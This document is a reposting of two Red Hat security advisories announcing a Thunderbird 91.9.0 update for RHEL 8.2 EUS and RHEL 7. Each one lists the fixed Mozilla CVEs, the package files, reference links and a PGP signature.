Red Hat Security Advisory 2022-1724-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.9.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:1724-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1724  
Issue date:        2022-05-05  
CVE Names:         CVE-2022-1520 CVE-2022-29909 CVE-2022-29911  
                   CVE-2022-29912 CVE-2022-29913 CVE-2022-29914  
                   CVE-2022-29916 CVE-2022-29917  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.9.0.

Security Fix(es):

* Mozilla: Bypassing permission prompt in nested browsing contexts  
(CVE-2022-29909)

* Mozilla: iframe Sandbox bypass (CVE-2022-29911)

* Mozilla: Fullscreen notification bypass using popups (CVE-2022-29914)

* Mozilla: Leaking browser history with CSS variables (CVE-2022-29916)

* Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
(CVE-2022-29917)

* Mozilla: Reader mode bypassed SameSite cookies (CVE-2022-29912)

* Mozilla: Speech Synthesis feature not properly disabled (CVE-2022-29913)

* Mozilla: Incorrect security status shown after viewing an attached email  
(CVE-2022-1520)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081468 - CVE-2022-29914 Mozilla: Fullscreen notification bypass using popups  
2081469 - CVE-2022-29909 Mozilla: Bypassing permission prompt in nested browsing contexts  
2081470 - CVE-2022-29916 Mozilla: Leaking browser history with CSS variables  
2081471 - CVE-2022-29911 Mozilla: iframe Sandbox bypass  
2081472 - CVE-2022-29912 Mozilla: Reader mode bypassed SameSite cookies  
2081473 - CVE-2022-29917 Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
2082037 - CVE-2022-1520 Mozilla: Incorrect security status shown after viewing an attached email  
2082038 - CVE-2022-29913 Mozilla: Speech Synthesis feature not properly disabled

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v. 8.2):

Source:  
thunderbird-91.9.0-3.el8_2.src.rpm

aarch64:  
thunderbird-91.9.0-3.el8_2.aarch64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_2.aarch64.rpm  
thunderbird-debugsource-91.9.0-3.el8_2.aarch64.rpm

ppc64le:  
thunderbird-91.9.0-3.el8_2.ppc64le.rpm  
thunderbird-debuginfo-91.9.0-3.el8_2.ppc64le.rpm  
thunderbird-debugsource-91.9.0-3.el8_2.ppc64le.rpm

x86_64:  
thunderbird-91.9.0-3.el8_2.x86_64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_2.x86_64.rpm  
thunderbird-debugsource-91.9.0-3.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1520  
https://access.redhat.com/security/cve/CVE-2022-29909  
https://access.redhat.com/security/cve/CVE-2022-29911  
https://access.redhat.com/security/cve/CVE-2022-29912  
https://access.redhat.com/security/cve/CVE-2022-29913  
https://access.redhat.com/security/cve/CVE-2022-29914  
https://access.redhat.com/security/cve/CVE-2022-29916  
https://access.redhat.com/security/cve/CVE-2022-29917  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYnQGkdzjgjWX9erEAQhV9g//UBgdvcY2b7ZQEPB+5pciqRnkhL80NkgQ  
3+sQxhlO+l3msZoVn52oua38URGyAxg/RrYOEkL3WK7eLFwd35r32QRKV/SihqSU  
0jxD2gQpyAstG0xzer8zpQPPdLJgjKup/zsGnbeH06UBKFSX3+5m4t77tD0MgzaB  
xTCJ5dqgEMBd8nAs03Clg1ta6OLF3kOSw8EC1hCw2OFN+jrvnBy7ou66jb5Hm1ow  
zOG6fgj3S4VTqwPhuUCKywnpYQMNWZbaZ19B4SJ7QiOYPW1eumVBchoHMQj99uXX  
O65JDcwmR7AAYn1McibMTcsP6amlPyOzp08ykmvtT8fQ8AE+kPdOdQSq3ZnGtjxj  
3LQ4CtEGC/BXnqfbTVwjFVPEE65ZIHrT/7GzwofwT1uWpcEhNjjUOaKDvcI68JBb  
O7V3ufU1e5UVccHU9Hz9RbaczCAAhSFO/KJli3RwrvVjePZf4zfz8h73sc1GIVnn  
XHMrr5REvk0KUJHOwPoihKysI8/wySwc3fPxhQWAeGtjcmWa9v8lchuavdynu/u+  
9KKLJAmR4ZlHuY8yloyjjJ2/Fl0OMdIYwBsTvl/vzfEetqvtCxKOV0TZiyUiXN7A  
JFkhRyZiHhB5qXkxXbQ9FX5Rn809l6kDYEXJ+Gn63iRD9ND/r8rhhAtFoe28Zmji  
eIXLwAtKiCU=FYeO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1724-01

Red Hat Security Advisory 2022-1725-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.9.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:1725-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1725  
Issue date:        2022-05-05  
CVE Names:         CVE-2022-1520 CVE-2022-29909 CVE-2022-29911  
                   CVE-2022-29912 CVE-2022-29913 CVE-2022-29914  
                   CVE-2022-29916 CVE-2022-29917  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64le, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.9.0.

Security Fix(es):

* Mozilla: Bypassing permission prompt in nested browsing contexts  
(CVE-2022-29909)

* Mozilla: iframe Sandbox bypass (CVE-2022-29911)

* Mozilla: Fullscreen notification bypass using popups (CVE-2022-29914)

* Mozilla: Leaking browser history with CSS variables (CVE-2022-29916)

* Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
(CVE-2022-29917)

* Mozilla: Reader mode bypassed SameSite cookies (CVE-2022-29912)

* Mozilla: Speech Synthesis feature not properly disabled (CVE-2022-29913)

* Mozilla: Incorrect security status shown after viewing an attached email  
(CVE-2022-1520)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081468 - CVE-2022-29914 Mozilla: Fullscreen notification bypass using popups  
2081469 - CVE-2022-29909 Mozilla: Bypassing permission prompt in nested browsing contexts  
2081470 - CVE-2022-29916 Mozilla: Leaking browser history with CSS variables  
2081471 - CVE-2022-29911 Mozilla: iframe Sandbox bypass  
2081472 - CVE-2022-29912 Mozilla: Reader mode bypassed SameSite cookies  
2081473 - CVE-2022-29917 Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
2082037 - CVE-2022-1520 Mozilla: Incorrect security status shown after viewing an attached email  
2082038 - CVE-2022-29913 Mozilla: Speech Synthesis feature not properly disabled

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
thunderbird-91.9.0-3.el7_9.src.rpm

x86_64:  
thunderbird-91.9.0-3.el7_9.x86_64.rpm  
thunderbird-debuginfo-91.9.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
thunderbird-91.9.0-3.el7_9.src.rpm

ppc64le:  
thunderbird-91.9.0-3.el7_9.ppc64le.rpm  
thunderbird-debuginfo-91.9.0-3.el7_9.ppc64le.rpm

x86_64:  
thunderbird-91.9.0-3.el7_9.x86_64.rpm  
thunderbird-debuginfo-91.9.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
thunderbird-91.9.0-3.el7_9.src.rpm

x86_64:  
thunderbird-91.9.0-3.el7_9.x86_64.rpm  
thunderbird-debuginfo-91.9.0-3.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1520  
https://access.redhat.com/security/cve/CVE-2022-29909  
https://access.redhat.com/security/cve/CVE-2022-29911  
https://access.redhat.com/security/cve/CVE-2022-29912  
https://access.redhat.com/security/cve/CVE-2022-29913  
https://access.redhat.com/security/cve/CVE-2022-29914  
https://access.redhat.com/security/cve/CVE-2022-29916  
https://access.redhat.com/security/cve/CVE-2022-29917  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYnQGm9zjgjWX9erEAQgCmw/+P1B59avcc7pYnjq5wi9OPIJyy4cysV+B  
OPgZV1WJKnWC2N2gDG8kHFkL3cKYDqZDN1thHAWrHse9NNQC3fLMNl+MqTQEwD+n  
M/JD27Bx/C2d7HXLfIvb2pA+I6je13zd5Vtcr7NvGhPLkahgOQvZ6doptdc432u+  
i7dkFlfxiWx/iQQpcFnX8XPQeeRtRqKTIgeBr4dWny8CsvEjC7MAXwnaz/XkL8Ll  
YOf6MCdFkc+RYAYlqeWEbh5Tbw60xkSSLIBVmBy8TbY3Ck9WE/CGdSNpysg/QdiM  
WUSueZtiN0odvUN4ZnqmtbkUowu7koH9ABnlWXFBckC/w24/2tVL8RtB/yx4Yi8b  
gxhWV3T55JRTudbQSx2e9jVWOONJnhNf57HX45Bim4kY5z5XMnRFA1y1ohVPAQ0O  
Gmue+zKO2kMvogP2yHHSIz3vBMuN+Cb/3D0LbWHwrWoeT9FBZN3kTIzlMzPRgwPQ  
wdpzXCyjYSb3jUvRd7qwvZmjCAfByjGtkwXjrlwPmWqaoheIHNlMUiGJJf//zdR1  
+gZXhs02ibj/vVlXVFS1APhbriVx+sU9zDXyWIhGMJdpUt3+0N/tbbdaQ7QP9a+h  
cYobRL//6cGFeEDYbutD6a0qfmM8hMrNNatw+anSZ6uf1vUQZMmRcmMPGG0RQt/v  
2yFjaAHH0HkÝMk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#perl